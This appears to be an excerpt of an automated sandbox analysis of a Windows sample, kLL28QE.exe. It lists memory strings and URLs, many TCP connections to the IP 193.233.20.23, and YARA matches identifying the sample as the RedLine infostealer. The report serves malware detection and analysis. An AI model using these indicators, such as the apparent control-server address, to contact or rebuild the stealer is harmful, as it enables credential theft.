                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.000000000501B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: kLL28QE.exe, kLL28QE.exe, 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: kLL28QE.exe, 00000006.00000002.408891650.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4a47da6.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.3.kLL28QE.exe.3170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.71b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.71b0000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4a47da6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
